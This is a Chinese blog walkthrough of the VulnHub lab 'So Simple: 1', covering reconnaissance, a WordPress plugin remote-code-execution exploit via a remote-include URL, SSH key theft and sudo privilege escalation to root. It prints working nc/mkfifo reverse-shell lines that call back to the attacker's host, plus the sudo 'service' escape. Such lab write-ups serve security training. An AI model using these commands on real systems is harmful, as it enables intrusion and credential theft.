vulnhub靶机-So Simple: 1

最新推荐文章于 2024-03-20 23:45:00 发布
最新推荐文章于 2024-03-20 23:45:00 发布
阅读量1.2k 收藏
点赞数
分类专栏: vulnhub靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43784056/article/details/107920462
版权

1、靶机开机即得ip地址:192.168.8.109

2、扫描靶机端口

root@kali:~# nmap -A -p- 192.168.8.109
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for so-simple (192.168.8.109)
Host is up (0.00056s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: So Simple
8000/tcp open  http    SimpleHTTPServer 0.6 (Python 3.8.2)
|_http-server-header: SimpleHTTP/0.6 Python/3.8.2
|_http-title: Directory listing for /
MAC Address: 08:00:27:7C:5B:84 (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/10%OT=22%CT=1%CU=33714%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=5F313208%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=108%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.56 ms so-simple (192.168.8.109)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.45 seconds
root@kali:~#

3、访问80端口,只有一个静态页面

扫描目录,发现一个wordpress目录,访问是一个wp站点

root@kali:~# gobuster dir -u http://192.168.8.109 -w /usr/share/wordlists/dirb/big.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.8.109
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/server-status (Status: 403)
/wordpress (Status: 301)
===============================================================
Finished
===============================================================
root@kali:~#

使用wpscan扫描一下,发现一个插件

搜索一下对应版本漏洞,找到一个rce漏洞

4、漏洞利用,本地新建一个shell.txt,内容如下,192.168.8.209是kali的ip

<pre>
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.8.209 4444 >/tmp/f');
</pre>

在kali上使用python本地搭建一个简易web服务器,然后开启监听

python -m SimpleHTTPServer

访问链接反弹shell

http://192.168.8.109/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.8.209:8000/shell.txt

 

5、拿到第一个flag

进入到/home目录,发现有两个用户文件夹,先进入max目录,发现一个user.txt文件,但是没有访问权限,还有一个.ssh目录,进入到这个目录下,将id_rsa使用python3搭建简易服务器下载到本地,或者查看复制到本地也行

www-data@so-simple:/var/www/html/wordpress/wp-admin$ cd /home
cd /home
www-data@so-simple:/home$ ls
ls
max
steven
www-data@so-simple:/home$ cd max
cd max
www-data@so-simple:/home/max$ ls -la
ls -la
total 52
drwxr-xr-x 7 max  max  4096 Jul 15 18:19 .
drwxr-xr-x 4 root root 4096 Jul 12 22:42 ..
-rw-r--r-- 1 max  max   220 Feb 25 12:03 .bash_logout
-rw-r--r-- 1 max  max  3810 Jul 12 21:40 .bashrc
drwx------ 2 max  max  4096 Jul 12 13:06 .cache
drwx------ 3 max  max  4096 Jul 12 15:39 .gnupg
drwxrwxr-x 3 max  max  4096 Jul 12 15:24 .local
-rw------- 1 max  max   118 Jul 12 20:44 .mysql_history
-rw-r--r-- 1 max  max   807 Feb 25 12:03 .profile
drwxr-xr-x 2 max  max  4096 Jul 14 19:41 .ssh
-rw-r--r-- 1 max  max    49 Jul 12 20:41 personal.txt
drwxrwxr-x 3 max  max  4096 Jul 12 21:23 this
-rwxr-x--- 1 max  max    33 Jul 13 21:41 user.txt
www-data@so-simple:/home/max$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
www-data@so-simple:/home/max$ cd .ssh   
cd .ssh
www-data@so-simple:/home/max/.ssh$ ls -la
ls -la
total 20
drwxr-xr-x 2 max  max  4096 Jul 14 19:41 .
drwxr-xr-x 7 max  max  4096 Jul 15 18:19 ..
-rw-r--r-- 1 max  max   568 Jul 14 19:41 authorized_keys
-rwxr-xr-x 1 root root 2602 Jul 14 19:41 id_rsa
-rw-r--r-- 1 root root  568 Jul 14 19:41 id_rsa.pub
www-data@so-simple:/home/max/.ssh$ python3 -m http.server
python3 -m http.server

 使用该文件ssh登录,查看user.txt得到第一个flag

root@kali:~# wget http://192.168.8.109:8000/id_rsa
http://192.168.8.109:8000/id_rsa
正在连接 192.168.8.109:8000... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:2602 (2.5K) [application/octet-stream]
正在保存至: “id_rsa”

id_rsa                              100%[==================================================================>]   2.54K  --.-KB/s  用时 0s      

(180 MB/s) - 已保存 “id_rsa” [2602/2602])
root@kali:~# chmod 600 id_rsa 
root@kali:~# ssh -i id_rsa max@192.168.8.109
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Aug 10 10:38:06 UTC 2020

  System load:  0.49              Processes:                132
  Usage of /:   55.6% of 8.79GB   Users logged in:          0
  Memory usage: 20%               IPv4 address for docker0: 172.17.0.1
  Swap usage:   0%                IPv4 address for enp0s3:  192.168.8.109

 * "If you've been waiting for the perfect Kubernetes dev solution for
   macOS, the wait is over. Learn how to install Microk8s on macOS."

   https://www.techrepublic.com/article/how-to-install-microk8s-on-macos/

47 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Wed Jul 15 19:18:39 2020 from 192.168.1.7

max@so-simple:~$ ls
lpersonal.txt  this  user.txt
max@so-simple:~$ cat user.txt 
073dafccfe902526cee753455ff1dbb0

查看lpersonal.txt的内容,base64解密,没啥用

SGFoYWhhaGFoYSwgaXQncyBub3QgdGhhdCBlYXN5ICEhISA=

Hahahahaha, it's not that easy !!!

6、使用sudo -l发现可以免密使用steven身份执行service命令

max@so-simple:~$ sudo -l
Matching Defaults entries for max on so-simple:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User max may run the following commands on so-simple:
    (steven) NOPASSWD: /usr/sbin/service
max@so-simple:~$

使用service命令提权到steven,在家目录下发现user2.txt,得到第二个flag

max@so-simple:~$ sudo -u steven service ../../bin/bash
steven@so-simple:/$ cd ~
steven@so-simple:/home/steven$ ls
user2.txt
steven@so-simple:/home/steven$ cat user2.txt 
b662b31b7d8cb9f5cdc9c2010337f9b8
steven@so-simple:/home/steven$

7、使用sudo -l发现可以免密使用root身份运行一个脚本文件

steven@so-simple:/home/steven$ sudo -l
Matching Defaults entries for steven on so-simple:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User steven may run the following commands on so-simple:
    (root) NOPASSWD: /opt/tools/server-health.sh
steven@so-simple:/home/steven$

进入到opt目录下,没有tools目录,自己新建目录和文件,写入内容

steven@so-simple:/home/steven$ cd /opt/tools/
steven@so-simple:/opt/tools$ cat server-health.sh 
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.8.209 1234 >/tmp/f
steven@so-simple:/opt/tools$

本地监听1234端口

使用root身份执行脚本,成功反弹shell,拿到最终flag

steven@so-simple:/opt/tools$ sudo -u root ./server-health.sh 


root@so-simple:/opt/tools# cd ~
cd ~
root@so-simple:~# ls
ls
flag.txt
snap
root@so-simple:~# cat flag.txt
cat flag.txt


  /$$$$$$                                                     /$$              /$$                                   
 /$$__  $$                                                   | $$             | $$                                   
| $$  \__/  /$$$$$$  /$$$$$$$   /$$$$$$   /$$$$$$  /$$$$$$  /$$$$$$  /$$$$$$$$| $$                                   
| $$       /$$__  $$| $$__  $$ /$$__  $$ /$$__  $$|____  $$|_  $$_/ |____ /$$/| $$                                   
| $$      | $$  \ $$| $$  \ $$| $$  \ $$| $$  \__/ /$$$$$$$  | $$      /$$$$/ |__/                                   
| $$    $$| $$  | $$| $$  | $$| $$  | $$| $$      /$$__  $$  | $$ /$$ /$$__/                                         
|  $$$$$$/|  $$$$$$/| $$  | $$|  $$$$$$$| $$     |  $$$$$$$  |  $$$$//$$$$$$$$ /$$                                   
 \______/  \______/ |__/  |__/ \____  $$|__/      \_______/   \___/ |________/|__/                                   
                               /$$  \ $$                                                                             
                              |  $$$$$$/                                                                             
                               \______/                                                                              
 /$$     /$$                  /$$                                                                           /$$      
|  $$   /$$/                 | $/                                                                          | $$      
 \  $$ /$$//$$$$$$  /$$   /$$|_//$$    /$$ /$$$$$$         /$$$$$$  /$$  /$$  /$$ /$$$$$$$   /$$$$$$   /$$$$$$$      
  \  $$$$//$$__  $$| $$  | $$  |  $$  /$$//$$__  $$       /$$__  $$| $$ | $$ | $$| $$__  $$ /$$__  $$ /$$__  $$      
   \  $$/| $$  \ $$| $$  | $$   \  $$/$$/| $$$$$$$$      | $$  \ $$| $$ | $$ | $$| $$  \ $$| $$$$$$$$| $$  | $$      
    | $$ | $$  | $$| $$  | $$    \  $$$/ | $$_____/      | $$  | $$| $$ | $$ | $$| $$  | $$| $$_____/| $$  | $$      
    | $$ |  $$$$$$/|  $$$$$$/     \  $/  |  $$$$$$$      | $$$$$$$/|  $$$$$/$$$$/| $$  | $$|  $$$$$$$|  $$$$$$$      
    |__/  \______/  \______/       \_/    \_______/      | $$____/  \_____/\___/ |__/  |__/ \_______/ \_______/      
                                                         | $$                                                        
 /$$ /$$$$$$                   /$$$$$$  /$$              | $$       /$$          /$$                                 
| $//$$__  $$                 /$$__  $$|__/              |__/      | $$         | $/                                 
|_/| $$  \__/  /$$$$$$       | $$  \__/ /$$ /$$$$$$/$$$$   /$$$$$$ | $$  /$$$$$$|_/                                  
   |  $$$$$$  /$$__  $$      |  $$$$$$ | $$| $$_  $$_  $$ /$$__  $$| $$ /$$__  $$                                    
    \____  $$| $$  \ $$       \____  $$| $$| $$ \ $$ \ $$| $$  \ $$| $$| $$$$$$$$                                    
    /$$  \ $$| $$  | $$       /$$  \ $$| $$| $$ | $$ | $$| $$  | $$| $$| $$_____/                                    
   |  $$$$$$/|  $$$$$$/      |  $$$$$$/| $$| $$ | $$ | $$| $$$$$$$/| $$|  $$$$$$$                                    
    \______/  \______/        \______/ |__/|__/ |__/ |__/| $$____/ |__/ \_______/                                    
                                                         | $$                                                        
                                                         | $$                                                        
                                                         |__/                                                        

Easy box right? Hope you've had fun! Show me the flag on Twitter @roelvb79


root@so-simple:~#

 

0ne_
关注
专栏目录
vulnhub-So Simple 1
yutianovo的博客
08-10 1409
靶机描述 This is an easy level VM with some rabbitholes. Enumeration is key to find your way in. There are three flags (2 user and 1 root flag). The VM is tested on Virtualbox. After the startup it shows the IP address. Share your rootflag with me on Twitter
SO SIMPLE: 1靶机
logan_logan的博客
07-22 305
1.在浏览器输入地址打开 2.端口扫描 nmap -A -p- -T4 10.36.101.171 开的端口不是很多,不过可以看到8443端口后面包含有LXD的信息,说不定在提权的时候能用到; 3.目录枚举 目录枚举的时候看到有wordpress,准备上Wpscan工具进行枚举; 4.在网页打开这个目录 查看源代码的时候发现Social Warfare竟然是3.5版本的,判断很可能出现Social Warfare <= 3.5.2 - Unauthenticated Remote Code
vulnhub】【DC系列】DC2 - WordPress 靶机
Nicky_Zheng的博客
01-26 824
1、信息收集 1.1、端口扫描 netdiscover发现靶机ip : 192.168.57.148 nmap -sSV -A -Pn -n -p 1-65535 --version-intensity 9 192.168.57.148 Nmap scan report for 192.168.57.148 Host is up (0.00100s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 80/tcp
VulnHub靶机-SkyTower
Slow_的博客
02-26 759
VulnHub靶机-SkyTower 下载地址:https://www.vulnhub.com/entry/skytower-1,96/ 下载靶机后在VirtualBox下打开,网卡配置为桥接 任务:提权并获取flag 环境: 攻击机和靶机均在192.168.8.0段 攻击机:kali linux 192.168.8.108 文章目录VulnHub靶机-SkyTower一、信息搜集二、提权 一、信息搜集 要想渗透靶机,首先得知道靶机的IP是什么,我们先用nmap探测存活主机。 命令:nmap -sP 19
使用dnsmasq搭建wifi热点DHCP服务器的最简方法
六个九十度
10-16 1万+
不用创建(也不用修改)/etc/dnsmasq.conf文件,方便工程打包和移植
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub靶机实战--FunBox3:EASY
m0_64312309的博客
09-21 658
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
vulnhub靶机实战--FunBox:1
m0_64312309的博客
09-21 531
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
VulnHub靶机-Jangow: 1.0.1
weixin_46694260的博客
09-15 2708
迟到的文章,就当库存发出来吧~
sql服务器客户端
07-15
基于SQL的简单服务器程序 namespace Demo7 { class Program { static void Main string[] args { try { IPAddress MyIP IPAddress Parse "192 168 8 109" ; IPEndPoint Myserver new IPEndPoint MyIP 6688 ; Socket s new Socket AddressFamily InterNetwork SocketType Stream ProtocolType Tcp ; s Connect Myserver ; if s Connected true { Console WriteLine "连接成功" ; } byte[] Mybyte Encoding ASCII GetBytes "I am a doubi" ; s Send Mybyte ; s Shutdown SocketShutdown Both ; s Close ; } catch Exception ee { Console WriteLine ee Message ; } } } }">基于SQL的简单服务器程序 namespace Demo7 { class Program { static void Main string[] args { try { IPAddress MyIP IPAddress Parse "192 168 8 109" ; IPEndPoint Myserver new IPEndPoint MyIP 6688 ; [更多]
实战打靶集锦-027-SoSimple1
最新发布
阿尔泰野狼的博客
03-20 1791
本文简单记录了博主的一次打靶经历,涉及wordpress扫描与爆破、social-warfare远程代码执行漏洞、sudo命令提权等
ubuntu 提示 XX updates can be installed immediately.
csdn406816222的博客
09-14 2443
189 updates can be installed immediately. 87 of these updates are security updates. To see these additional updates run: apt list --upgradable 升级处理命令: sudo apt-get update sudo apt-get upgrade sudo apt-get dist-upgrade sudo reboot
SSH远程免密别名登陆
追梦的博客
05-10 324
目录SSH的安装本地宿主机的操作上传密钥-公钥通过编写配置文件,别名访问远程服务器 SSH的安装 通常本地宿主机想要访问远程的服务器时,需要借助ssh这种类似的加密协议进行传输。 SSH运行和使用分别为openssh-client和openssh-server。因此,我们需要查看是否安装该类软件包。 ➜ ~ dpkg -l | grep ssh ii libssh-4:amd64...
Ubuntu下启用telnet服务
寞水
10-31 6131
寞水
嵌入式linux学习笔记-- ubuntu欢迎信息分析
jeason的博客
01-23 1185
之前的阿里云的服务器登录上去总是会有欢迎信息,welcode to Ali cloud service xxx一直以来也没去掉,最近突发奇想,想要去修改一下这个欢迎信息,结果发现这个欢迎信息内容还是挺多的,今天整理一下。 首先分析一下欢迎信息都有啥以下是登录ucloud 服务器的提示信息(ali 的已经改了。。。。没得看了)。 Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-48-generic x86_64) * Documentation: http
ssh 配置的一些问题
yong1585855343的博客
11-16 923
1. ssh启动错误:no hostkeys available— exiting 在 hadoop 伪分布配置安装的教程里 http://dblab.xmu.edu.cn/blog/2441-2/ 在“安装SSH、配置SSH无密码登陆”这一步,启动 ssh 时, sudo /etc/init.d/ssh start 出现了问题: no hostkeys available— exiting 解决办法(使用 root 权限运行): ssh-keygen -t dsa -f /etc/ssh/
在ubuntu20.04下安装lib32ncurses5-dev失败的解决方法
热门推荐
南岭笑笑生之家
02-21 1万+
在ubuntu20.04下安装lib32ncurses5-dev失败的解决方法 13:24 2020/2/21 星期五 rootroot@rootroot-HP-Laptop-14s-dp0xxx:~$ rootroot@rootroot-HP-Laptop-14s-dp0xxx:~$ rootroot@rootroot-HP-Laptop-14s-dp0xxx:~$ sudo...
nmap 基础操作
weixin_41204736的博客
03-13 7159
nmap 主要功能: 主机探测 端口扫描 版本检测 系统检测 支持探测脚本的编写 nmap 实际应用场合 通过对设备或或者防火墙的探测来审计它的安全性 探测目标主机所开放的端口 通过识别新的服务器审计网络的安全性   探测网络上的主机   使用 ping scan 只进行主机发现,不进行端口扫描 #nmap -sn &lt;target&gt; 例1、 (ics) p...
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值